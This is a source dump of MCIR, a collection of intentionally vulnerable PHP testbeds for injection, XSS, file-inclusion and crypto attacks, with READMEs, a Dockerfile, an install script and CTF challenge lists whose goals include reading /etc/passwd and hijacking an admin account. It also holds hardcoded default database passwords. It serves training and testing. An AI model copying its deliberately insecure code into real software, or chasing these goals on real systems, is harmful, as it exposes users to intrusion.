├── CHANGELOG ├── Dockerfile ├── LICENSE ├── README.cryptomg ├── README.md ├── README.phpwn ├── README.rfidk ├── README.shellol ├── README.sqlol ├── README.xmlmao ├── README.xssmh ├── autoinstall.sh ├── cryptomg ├── challenges.htm ├── chosenct.php ├── chosenpt.php ├── ctf.php ├── ctf │ ├── challenge1 │ │ ├── files │ │ │ ├── hello │ │ │ ├── home │ │ │ ├── links │ │ │ ├── pictures │ │ │ └── test │ │ └── index.php │ ├── challenge2 │ │ ├── db.php │ │ └── index.php │ ├── challenge3 │ │ └── index.php │ ├── challenge4 │ │ ├── db.php │ │ ├── index.php │ │ └── register.php │ ├── challenge5 │ │ ├── files │ │ │ ├── hello │ │ │ ├── home │ │ │ ├── links │ │ │ ├── pictures │ │ │ └── test │ │ └── index.php │ └── index.php ├── includes │ ├── db.inc.php │ ├── header.inc.php │ ├── init.php │ ├── nav.inc.php │ └── settingsBar.inc.php ├── index.php ├── random.php └── style.css ├── docker-compose.yml ├── includes ├── environ.inc.php ├── mcir.css ├── mcir.nav.inc.php ├── mcir.png ├── options.inc.php └── sanitize.inc.php ├── index.php ├── phpwn ├── challenges.php ├── challenges │ ├── challenge0.php │ └── tutorial0.txt ├── eval.php ├── includes │ ├── branding.php │ └── nav.inc.php └── index.php ├── rfidk ├── INSTALL ├── challenges.php ├── challenges │ ├── challenge0.php │ └── tutorial0.txt ├── include.php ├── includes │ ├── branding.php │ └── nav.inc.php ├── index.php └── pages │ └── date.php ├── shellol ├── challenges.htm ├── challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ └── challenge6.php ├── includes │ └── nav.inc.php ├── index.php └── shell.php ├── splash └── index.php ├── sqlol ├── challenges.htm ├── challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge10.php │ ├── challenge11.php │ ├── challenge12.php │ ├── challenge13.php │ ├── challenge14.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ ├── challenge6.php │ ├── challenge7.php │ ├── challenge8.php │ ├── challenge9.php │ ├── tutorial0.txt │ ├── tutorial1.txt │ ├── tutorial2.txt │ ├── tutorial3.txt │ ├── tutorial4.txt │ ├── tutorial5.txt │ ├── tutorial6.txt │ ├── tutorial7.txt │ ├── tutorial8.txt │ └── tutorial9.txt ├── custom.php ├── delete.php ├── includes │ ├── adodb │ │ ├── .idea │ │ │ ├── adodb.iml │ │ │ ├── copyright │ │ │ │ └── profiles_settings.xml │ │ │ ├── dictionaries │ │ │ │ └── dregad.xml │ │ │ ├── inspectionProfiles │ │ │ │ ├── Project_Default.xml │ │ │ │ └── profiles_settings.xml │ │ │ ├── modules.xml │ │ │ ├── vcs.xml │ │ │ └── workspace.xml │ │ ├── .mailmap │ │ ├── LICENSE.md │ │ ├── README.md │ │ ├── adodb-active-record.inc.php │ │ ├── adodb-active-recordx.inc.php │ │ ├── adodb-csvlib.inc.php │ │ ├── adodb-datadict.inc.php │ │ ├── adodb-error.inc.php │ │ ├── adodb-errorhandler.inc.php │ │ ├── adodb-errorpear.inc.php │ │ ├── adodb-exceptions.inc.php │ │ ├── adodb-iterator.inc.php │ │ ├── adodb-lib.inc.php │ │ ├── adodb-memcache.lib.inc.php │ │ ├── adodb-pager.inc.php │ │ ├── adodb-pear.inc.php │ │ ├── adodb-perf.inc.php │ │ ├── adodb-php4.inc.php │ │ ├── adodb-time.inc.php │ │ ├── adodb-xmlschema.inc.php │ │ ├── adodb-xmlschema03.inc.php │ │ ├── adodb.inc.php │ │ ├── composer.json │ │ ├── contrib │ │ │ └── toxmlrpc.inc.php │ │ ├── cute_icons_for_site │ │ │ ├── adodb.gif │ │ │ └── adodb2.gif │ │ ├── datadict │ │ │ ├── datadict-access.inc.php │ │ │ ├── datadict-db2.inc.php │ │ │ ├── datadict-firebird.inc.php │ │ │ ├── datadict-generic.inc.php │ │ │ ├── datadict-ibase.inc.php │ │ │ ├── datadict-informix.inc.php │ │ │ ├── datadict-mssql.inc.php │ │ │ ├── datadict-mssqlnative.inc.php │ │ │ ├── datadict-mysql.inc.php │ │ │ ├── datadict-mysqli.inc.php │ │ │ ├── datadict-oci8.inc.php │ │ │ ├── datadict-postgres.inc.php │ │ │ ├── datadict-sapdb.inc.php │ │ │ ├── datadict-sqlite.inc.php │ │ │ └── datadict-sybase.inc.php │ │ ├── docs │ │ │ ├── README.md │ │ │ ├── adodb.gif │ │ │ ├── adodb2.gif │ │ │ ├── changelog.md │ │ │ ├── changelog_v2.x.md │ │ │ ├── changelog_v3.x.md │ │ │ ├── changelog_v4+5.md │ │ │ └── changelog_v4.x.md │ │ ├── drivers │ │ │ ├── adodb-access.inc.php │ │ │ ├── adodb-ado.inc.php │ │ │ ├── adodb-ado5.inc.php │ │ │ ├── adodb-ado_access.inc.php │ │ │ ├── adodb-ado_mssql.inc.php │ │ │ ├── adodb-ads.inc.php │ │ │ ├── adodb-borland_ibase.inc.php │ │ │ ├── adodb-csv.inc.php │ │ │ ├── adodb-db2.inc.php │ │ │ ├── adodb-db2oci.inc.php │ │ │ ├── adodb-db2ora.inc.php │ │ │ ├── adodb-fbsql.inc.php │ │ │ ├── adodb-firebird.inc.php │ │ │ ├── adodb-ibase.inc.php │ │ │ ├── adodb-informix.inc.php │ │ │ ├── adodb-informix72.inc.php │ │ │ ├── adodb-ldap.inc.php │ │ │ ├── adodb-mssql.inc.php │ │ │ ├── adodb-mssql_n.inc.php │ │ │ ├── adodb-mssqlnative.inc.php │ │ │ ├── adodb-mssqlpo.inc.php │ │ │ ├── adodb-mysql.inc.php │ │ │ ├── adodb-mysqli.inc.php │ │ │ ├── adodb-mysqlpo.inc.php │ │ │ ├── adodb-mysqlt.inc.php │ │ │ ├── adodb-netezza.inc.php │ │ │ ├── adodb-oci8.inc.php │ │ │ ├── adodb-oci805.inc.php │ │ │ ├── adodb-oci8po.inc.php │ │ │ ├── adodb-oci8quercus.inc.php │ │ │ ├── adodb-odbc.inc.php │ │ │ ├── adodb-odbc_db2.inc.php │ │ │ ├── adodb-odbc_mssql.inc.php │ │ │ ├── adodb-odbc_oracle.inc.php │ │ │ ├── adodb-odbtp.inc.php │ │ │ ├── adodb-odbtp_unicode.inc.php │ │ │ ├── adodb-oracle.inc.php │ │ │ ├── adodb-pdo.inc.php │ │ │ ├── adodb-pdo_mssql.inc.php │ │ │ ├── adodb-pdo_mysql.inc.php │ │ │ ├── adodb-pdo_oci.inc.php │ │ │ ├── adodb-pdo_pgsql.inc.php │ │ │ ├── adodb-pdo_sqlite.inc.php │ │ │ ├── adodb-pdo_sqlsrv.inc.php │ │ │ ├── adodb-postgres.inc.php │ │ │ ├── adodb-postgres64.inc.php │ │ │ ├── adodb-postgres7.inc.php │ │ │ ├── adodb-postgres8.inc.php │ │ │ ├── adodb-postgres9.inc.php │ │ │ ├── adodb-proxy.inc.php │ │ │ ├── adodb-sapdb.inc.php │ │ │ ├── adodb-sqlanywhere.inc.php │ │ │ ├── adodb-sqlite.inc.php │ │ │ ├── adodb-sqlite3.inc.php │ │ │ ├── adodb-sqlitepo.inc.php │ │ │ ├── adodb-sybase.inc.php │ │ │ ├── adodb-sybase_ase.inc.php │ │ │ └── adodb-vfp.inc.php │ │ ├── lang │ │ │ ├── adodb-ar.inc.php │ │ │ ├── adodb-bg.inc.php │ │ │ ├── adodb-ca.inc.php │ │ │ ├── adodb-cn.inc.php │ │ │ ├── adodb-cz.inc.php │ │ │ ├── adodb-da.inc.php │ │ │ ├── adodb-de.inc.php │ │ │ ├── adodb-en.inc.php │ │ │ ├── adodb-eo.inc.php │ │ │ ├── adodb-es.inc.php │ │ │ ├── adodb-fa.inc.php │ │ │ ├── adodb-fr.inc.php │ │ │ ├── adodb-hu.inc.php │ │ │ ├── adodb-it.inc.php │ │ │ ├── adodb-nl.inc.php │ │ │ ├── adodb-pl.inc.php │ │ │ ├── adodb-pt-br.inc.php │ │ │ ├── adodb-ro.inc.php │ │ │ ├── adodb-ru.inc.php │ │ │ ├── adodb-sv.inc.php │ │ │ ├── adodb-th.inc.php │ │ │ └── adodb-uk.inc.php │ │ ├── nbproject │ │ │ ├── private │ │ │ │ ├── config.properties │ │ │ │ ├── private.properties │ │ │ │ └── private.xml │ │ │ ├── project.properties │ │ │ └── project.xml │ │ ├── pear │ │ │ ├── Auth │ │ │ │ └── Container │ │ │ │ │ └── ADOdb.php │ │ │ ├── auth_adodb_example.php │ │ │ └── readme.Auth.txt │ │ ├── perf │ │ │ ├── perf-db2.inc.php │ │ │ ├── perf-informix.inc.php │ │ │ ├── perf-mssql.inc.php │ │ │ ├── perf-mssqlnative.inc.php │ │ │ ├── perf-mysql.inc.php │ │ │ ├── perf-oci8.inc.php │ │ │ └── perf-postgres.inc.php │ │ ├── pivottable.inc.php │ │ ├── rsfilter.inc.php │ │ ├── server.php │ │ ├── session │ │ │ ├── adodb-compress-bzip2.php │ │ │ ├── adodb-compress-gzip.php │ │ │ ├── adodb-cryptsession.php │ │ │ ├── adodb-cryptsession2.php │ │ │ ├── adodb-encrypt-mcrypt.php │ │ │ ├── adodb-encrypt-md5.php │ │ │ ├── adodb-encrypt-secret.php │ │ │ ├── adodb-encrypt-sha1.php │ │ │ ├── adodb-sess.txt │ │ │ ├── adodb-session-clob.php │ │ │ ├── adodb-session-clob2.php │ │ │ ├── adodb-session.php │ │ │ ├── adodb-session2.php │ │ │ ├── adodb-sessions.mysql.sql │ │ │ ├── adodb-sessions.oracle.clob.sql │ │ │ ├── adodb-sessions.oracle.sql │ │ │ ├── crypt.inc.php │ │ │ ├── old │ │ │ │ ├── adodb-cryptsession.php │ │ │ │ ├── adodb-session-clob.php │ │ │ │ ├── adodb-session.php │ │ │ │ └── crypt.inc.php │ │ │ ├── session_schema.xml │ │ │ └── session_schema2.xml │ │ ├── tests │ │ │ ├── benchmark.php │ │ │ ├── client.php │ │ │ ├── pdo.php │ │ │ ├── test-active-record.php │ │ │ ├── test-active-recs2.php │ │ │ ├── test-active-relations.php │ │ │ ├── test-active-relationsx.php │ │ │ ├── test-datadict.php │ │ │ ├── test-perf.php │ │ │ ├── test-pgblob.php │ │ │ ├── test-php5.php │ │ │ ├── test-xmlschema.php │ │ │ ├── test.php │ │ │ ├── test2.php │ │ │ ├── test3.php │ │ │ ├── test4.php │ │ │ ├── test5.php │ │ │ ├── test_rs_array.php │ │ │ ├── testcache.php │ │ │ ├── testdatabases.inc.php │ │ │ ├── testgenid.php │ │ │ ├── testmssql.php │ │ │ ├── testoci8.php │ │ │ ├── testoci8cursor.php │ │ │ ├── testpaging.php │ │ │ ├── testpear.php │ │ │ ├── testsessions.php │ │ │ ├── time.php │ │ │ ├── tmssql.php │ │ │ ├── xmlschema-mssql.xml │ │ │ └── xmlschema.xml │ │ ├── toexport.inc.php │ │ ├── tohtml.inc.php │ │ ├── x.php │ │ ├── xmlschema.dtd │ │ ├── xmlschema03.dtd │ │ └── xsl │ │ │ ├── convert-0.1-0.2.xsl │ │ │ ├── convert-0.1-0.3.xsl │ │ │ ├── convert-0.2-0.1.xsl │ │ │ ├── convert-0.2-0.3.xsl │ │ │ ├── remove-0.2.xsl │ │ │ └── remove-0.3.xsl │ ├── database.config.php │ ├── database.inc.php │ └── nav.inc.php ├── index.php ├── insert.php ├── resetbutton.php ├── select.php └── update.php ├── xmlmao ├── challenges.htm ├── data.xml ├── includes │ └── nav.inc.php ├── index.php ├── xmli_challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ ├── tutorial0.txt │ └── tutorial1.txt ├── xmlinjection.php ├── xpath.php ├── xpath_challenges │ ├── challenge0.php │ ├── challenge1.php │ ├── challenge2.php │ ├── challenge3.php │ ├── challenge4.php │ ├── challenge5.php │ ├── challenge6.php │ ├── tutorial0.txt │ ├── tutorial1.txt │ ├── tutorial2.txt │ ├── tutorial3.txt │ ├── tutorial4.txt │ ├── tutorial5.txt │ └── tutorial6.txt ├── xslt.php └── xslt_challenges │ └── challenge0.php └── xssmh ├── challenges.htm ├── challenges ├── challenge0.php ├── challenge1.php ├── challenge2.php ├── challenge3.php ├── challenge4.php ├── challenge5.php ├── challenge6.php ├── challenge7.php ├── tutorial0.txt ├── tutorial1.txt ├── tutorial2.txt ├── tutorial3.txt ├── tutorial4.txt └── tutorial5.txt ├── includes └── nav.inc.php ├── index.php ├── pxss.html ├── setup.sh └── xss.php /CHANGELOG: -------------------------------------------------------------------------------- 1 | v1.0 2 | Initial version 3 | 4 | v1.1 5 | Added CryptOMG 6 | Added CPA and CCA tools to CryptOMG 7 | 8 | v1.2 9 | Added PRNG tool to CryptOMG 10 | 11 | v1.2.1 12 | Added XSL injection testbed to XMLmao 13 | 14 | v1.3 15 | Added PHPwn 16 | Added RFIdk 17 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:5.6.13-apache 2 | 3 | # Install extra php modules 4 | RUN apt-get update 5 | RUN apt-get install -y php5-xsl php5-mcrypt libmcrypt-dev libxslt1-dev 6 | RUN docker-php-ext-install mcrypt xsl mysql 7 | 8 | # Add source 9 | COPY . /var/www/html/ 10 | 11 | # Configure mysql credentials / must match the ones in docker-compose.yml 12 | RUN sed -i "s/default_mcir_db_password/mcirpass00112233/" sqlol/includes/database.config.php 13 | RUN sed -i "s/default_mcir_db_password/mcirpass00112233/" cryptomg/includes/db.inc.php 14 | 15 | RUN sed -i "s/localhost/mysqldb/" sqlol/includes/database.config.php 16 | RUN sed -i "s/localhost/mysqldb/" cryptomg/includes/db.inc.php 17 | 18 | # Misc 19 | RUN chmod 666 xssmh/pxss.html 20 | -------------------------------------------------------------------------------- /README.cryptomg: -------------------------------------------------------------------------------- 1 | CryptOMG 2 | Released on SpiderLabs Anterior 3 | Andrew Jordan 4 | https://www.trustwave.com 5 | 6 | INTRODUCTION 7 | ============ 8 | 9 | *** 10 | WARNING: CryptOMG IS AN INTENTIONALLY VULNERABLE APPLICATION. IT SHOULD 11 | ONLY BE INSTALLED ON A TRUSTED WEB ENVIRONMENT. IT SHOULD NOT BE PUBLISHED 12 | ON A PRODUCTION SERVER AND SHOULD NOT BE ACCESSIBLE THROUGH THE INTERNET. 13 | *** 14 | 15 | CryptOMG is a configurable CTF style test bed that highlights common 16 | flaws in cryptographic implementations. Most of the challenges are 17 | designed to be cipher independent and to illustrate this, configuration 18 | options are provided that allow you to change the algorithm in use as 19 | well as the type of encoding. 20 | 21 | Cool Stuff Includes: 22 | o Cryptographic Oracles 23 | o Side Channel Attacks 24 | o Electronic Code Book Flaws 25 | o Configuration options for cipher and encoding 26 | 27 | REQUIREMENTS 28 | ============ 29 | 30 | A webserver running PHP 5.x 31 | MySQL 32 | libmcrypt4 33 | 34 | PHP Modules/Libraires: 35 | php5-mysql 36 | php5-mcrypt 37 | 38 | USAGE 39 | ===== 40 | Place the CryptOMG source files somewhere in your webroot. Modify 41 | /includes/db.inc.php with the settings for your database server. 42 | 43 | COPYRIGHT 44 | ========= 45 | 46 | CryptOMG - A configurable CTF style test bed. 47 | Andrew Jordan 48 | Copyright (C) 2014 Trustwave Holdings, Inc. 49 | 50 | This program is free software: you can redistribute it and/or modify it 51 | under the terms of the GNU General Public License as published by the 52 | Free Software Foundation, either version 3 of the License, or (at your 53 | option) any later version. 54 | 55 | This program is distributed in the hope that it will be useful, but 56 | WITHOUT ANY WARRANTY; without even the implied warranty of 57 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General 58 | Public License for more details. 59 | 60 | You should have received a copy of the GNU General Public License along 61 | with this program. If not, see . 62 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | :warning: *NOTE: This tool is no longer under active maintenance.* 2 | 3 | 4 | MCIR 5 | ==== 6 | 7 | The Magical Code Injection Rainbow! MCIR is a framework for building code injection vulnerability testbeds. 8 | 9 | MCIR unites SQLol, XMLmao, ShelLOL and XSSmh together in a magical world of code injection! They can experience the magic of feature sharing. Instead of having to wait for unicornFurnace to update each one, all the MCIR friends get updates they can all use! YAY! 10 | 11 | MCIR is designed to be good at making new friends, and they get to share updates to sanitization routines, environmental factor options, and interface tweaks. If you want to make a new friend to join the dancing and singing in the Magical Code Injection Rainbow, you can use any of the existing MCIR friends as a template and rewrite the portion where the friend does its magic, so we can inject ALL the things! YIPPEE! 12 | -------------------------------------------------------------------------------- /README.phpwn: -------------------------------------------------------------------------------- 1 | PHPwn 2 | Ben Loula 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: PHPwn IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE PHPwn IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | PHPwn is a configurable PHP eval() injection testbed. PHPwn allows 13 | you to exploit PHP file inclusion flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | PHPwn is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the PHPwn source files on your Web server and 30 | open in a Web browser. 31 | 32 | COPYRIGHT 33 | ========= 34 | 35 | PHPwn - A configurable PHP eval() injection testbed 36 | Ben Loula 37 | Copyright (C) 2014 Trustwave Holdings, Inc. 38 | 39 | This program is free software: you can redistribute it and/or modify 40 | it under the terms of the GNU General Public License as published by 41 | the Free Software Foundation, either version 3 of the License, or 42 | (at your option) any later version. 43 | 44 | This program is distributed in the hope that it will be useful, 45 | but WITHOUT ANY WARRANTY; without even the implied warranty of 46 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 47 | GNU General Public License for more details. 48 | 49 | You should have received a copy of the GNU General Public License 50 | along with this program. If not, see 51 | -------------------------------------------------------------------------------- /README.rfidk: -------------------------------------------------------------------------------- 1 | RFIdk 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: RFIdk IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE shellOL IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | RFIdk is a configurable PHP file inclusion testbed. RFIdk allows 13 | you to exploit PHP file inclusion flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | RFIdk is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the RFIdk source files on your Web server and 30 | open in a Web browser. 31 | If needed, set allow_url_fopen to "On" in your PHP ini file. 32 | 33 | COPYRIGHT 34 | ========= 35 | 36 | RFIdk - A configurable PHP file inclusion testbed 37 | Daniel "unicornFurnace" Crowley 38 | Copyright (C) 2014 Trustwave Holdings, Inc. 39 | 40 | This program is free software: you can redistribute it and/or modify 41 | it under the terms of the GNU General Public License as published by 42 | the Free Software Foundation, either version 3 of the License, or 43 | (at your option) any later version. 44 | 45 | This program is distributed in the hope that it will be useful, 46 | but WITHOUT ANY WARRANTY; without even the implied warranty of 47 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 48 | GNU General Public License for more details. 49 | 50 | You should have received a copy of the GNU General Public License 51 | along with this program. If not, see 52 | -------------------------------------------------------------------------------- /README.shellol: -------------------------------------------------------------------------------- 1 | ShellOL 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: ShellOL IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE shellOL IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | ShellOL is a configurable shell command injection testbed. shellOL allows 13 | you to exploit shell command injection flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | ShellOL is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the ShellOL source files on your Web server and 30 | open in a Web browser. 31 | 32 | COPYRIGHT 33 | ========= 34 | 35 | ShellOL - A configurable shell command injection testbed 36 | Daniel "unicornFurnace" Crowley 37 | Copyright (C) 2014 Trustwave Holdings, Inc. 38 | 39 | This program is free software: you can redistribute it and/or modify 40 | it under the terms of the GNU General Public License as published by 41 | the Free Software Foundation, either version 3 of the License, or 42 | (at your option) any later version. 43 | 44 | This program is distributed in the hope that it will be useful, 45 | but WITHOUT ANY WARRANTY; without even the implied warranty of 46 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 47 | GNU General Public License for more details. 48 | 49 | You should have received a copy of the GNU General Public License 50 | along with this program. If not, see 51 | -------------------------------------------------------------------------------- /README.xmlmao: -------------------------------------------------------------------------------- 1 | XMLmao 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: XMLmao IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE XMLmao IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | XMLmao is a configurable XML/XPath/XSL injection testbed. XMLmao allows 13 | you to exploit XML/XPath injection flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | XMLmao is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | Greetz to the folks at n|u http://null.co.in for giving me the motivation 20 | to code this tool. 21 | 22 | 23 | REQUIREMENTS 24 | ============ 25 | 26 | PHP 5.x 27 | XSLT php module (libxslt) 28 | Web server 29 | 30 | USAGE 31 | ===== 32 | 33 | Place the XMLmao source files on your Web server and 34 | open in a Web browser. 35 | 36 | COPYRIGHT 37 | ========= 38 | 39 | XMLmao - A configurable XML/XPath injection testbed 40 | Daniel "unicornFurnace" Crowley 41 | Copyright (C) 2014 Trustwave Holdings, Inc. 42 | 43 | This program is free software: you can redistribute it and/or modify 44 | it under the terms of the GNU General Public License as published by 45 | the Free Software Foundation, either version 3 of the License, or 46 | (at your option) any later version. 47 | 48 | This program is distributed in the hope that it will be useful, 49 | but WITHOUT ANY WARRANTY; without even the implied warranty of 50 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 51 | GNU General Public License for more details. 52 | 53 | You should have received a copy of the GNU General Public License 54 | along with this program. If not, see 55 | -------------------------------------------------------------------------------- /README.xssmh: -------------------------------------------------------------------------------- 1 | XSSmh 2 | Daniel Crowley 3 | http://www.trustwave.com 4 | 5 | INTRODUCTION 6 | ============ 7 | 8 | ***WARNING: XSSmh IS INTENTIONALLY VULNERABLE. 9 | DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT 10 | EXPOSE XSSmh IN AN UNTRUSTED ENVIRONMENT.*** 11 | 12 | XSSmh is a configurable Cross-Site Scripting injection testbed. XSSmh allows 13 | you to exploit Cross-Site Scripting flaws, but furthermore allows 14 | a large amount of control over the manifestation of the flaws. 15 | 16 | XSSmh is based on the idea of SQLol, an earlier release which 17 | allows for SQL injection exploitation. 18 | 19 | 20 | REQUIREMENTS 21 | ============ 22 | 23 | PHP 5.x 24 | Web server 25 | 26 | USAGE 27 | ===== 28 | 29 | Place the XSSmh source files on your Web server, run setup.sh and 30 | open in a Web browser. 31 | 32 | COPYRIGHT 33 | ========= 34 | 35 | XSSmh - A configurable Cross-Site Scripting testbed 36 | Daniel "unicornFurnace" Crowley 37 | Copyright (C) 2014 Trustwave Holdings, Inc. 38 | 39 | This program is free software: you can redistribute it and/or modify 40 | it under the terms of the GNU General Public License as published by 41 | the Free Software Foundation, either version 3 of the License, or 42 | (at your option) any later version. 43 | 44 | This program is distributed in the hope that it will be useful, 45 | but WITHOUT ANY WARRANTY; without even the implied warranty of 46 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 47 | GNU General Public License for more details. 48 | 49 | You should have received a copy of the GNU General Public License 50 | along with this program. If not, see 51 | -------------------------------------------------------------------------------- /autoinstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | apt-get install apache2 libapache2-mod-php5 php5-xsl php5-mcrypt mysql-server php5-mysqlnd 3 | echo -n "Please enter your database username: ";read username 4 | echo -n "Please enter your database password: ";read password 5 | mv sqlol/includes/database.config.php sqlol/includes/database.config.php.orig 6 | mv cryptomg/includes/db.inc.php cryptomg/includes/db.inc.php.orig 7 | sed "s/root/$username/" sqlol/includes/database.config.php.orig | sed "s/default_mcir_db_password/$password/" > sqlol/includes/database.config.php 8 | sed "s/root/$username/" cryptomg/includes/db.inc.php.orig | sed "s/default_mcir_db_password/$password/" > cryptomg/includes/db.inc.php 9 | chmod 666 xssmh/pxss.html 10 | echo "Initializing SQLol database..." 11 | php sqlol/resetbutton.php 12 | echo "MCIR should be set up now. Enjoy!" 13 | -------------------------------------------------------------------------------- /cryptomg/challenges.htm: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | CryptOMG - Challenges 15 | 16 | 17 | 18 |

CryptOMG - Challenges


19 |
20 |
21 |
22 |
23 | Nothing here yet. 24 |
25 | 26 | 27 | -------------------------------------------------------------------------------- /cryptomg/ctf.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | header("Location: ctf/"); 21 | ?> 22 | 23 | 24 | 25 | CryptOMG 26 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/hello: -------------------------------------------------------------------------------- 1 | Hello World 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/links: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge1/files/links -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/pictures: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge1/files/pictures -------------------------------------------------------------------------------- /cryptomg/ctf/challenge1/files/test: -------------------------------------------------------------------------------- 1 | This is a test 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge4/db.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | 21 | include "../../includes/db.inc.php"; 22 | 23 | $sql_create_table = "CREATE TABLE IF NOT EXISTS challenge4_users ( 24 | id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, 25 | username VARCHAR(32), 26 | password VARCHAR(32), 27 | email VARCHAR(64))"; 28 | $query_create_table = mysqli_query($sql_create_table) or die(mysqli_error()); 29 | 30 | $sql_insert_data = "INSERT INTO challenge4_users (id, username, password, email) 31 | VALUES(1, 'admin', '". 32 | md5("@4rfhaOsd(#d4l;hp)")."', 33 | 'admin@example.org')"; 34 | @$query_insert_data = mysqli_query($sql_insert_data); 35 | 36 | ?> 37 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/hello: -------------------------------------------------------------------------------- 1 | Hello World 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/links: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge5/files/links -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/pictures: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/cryptomg/ctf/challenge5/files/pictures -------------------------------------------------------------------------------- /cryptomg/ctf/challenge5/files/test: -------------------------------------------------------------------------------- 1 | This is a test 2 | -------------------------------------------------------------------------------- /cryptomg/ctf/index.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | ?> 21 | 22 | 23 | CryptOMG 24 | 25 | 26 |

CryptOMG

27 |
    28 |
  • Challenge 1
    29 |     Access the /etc/passwd file.
    • 30 |
  • Challenge 2
    31 |     Get the admin password.
    • 32 |
  • Challenge 3
    33 |     Decrypt the message.
    • 34 |
  • Challenge 4
    35 |     Hijack the administrator account
    • 36 |
  • Challenge 5
    37 |     Access the /etc/passwd file.
    • 38 |
39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /cryptomg/includes/db.inc.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | 21 | $db_host = "localhost"; 22 | $db_user = "root"; 23 | $db_pass = "default_mcir_db_password"; 24 | $db_name = "cryptomg"; 25 | 26 | $link = mysql_connect($db_host, $db_user, $db_pass); 27 | if(!$link) 28 | die("database error"); 29 | 30 | mysql_query("CREATE DATABASE IF NOT EXISTS $db_name"); 31 | $db_select = mysql_select_db($db_name, $link); 32 | if(!$db_select) 33 | die("can't select database"); 34 | ?> 35 | -------------------------------------------------------------------------------- /cryptomg/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 |
15 | | Chosen Plaintext Attack || Chosen Ciphertext Attack || Pseudo-Random Number Generator || Challenges || CTF-Style Challenges |
16 |
17 | 18 |
19 |
20 |
21 |
22 | -------------------------------------------------------------------------------- /cryptomg/includes/settingsBar.inc.php: -------------------------------------------------------------------------------- 1 | . 19 | */ 20 | ?> 21 | 22 |
23 |
24 | 25 | 30 | 31 | 36 | 37 | 42 | /> 43 | 44 |
45 |
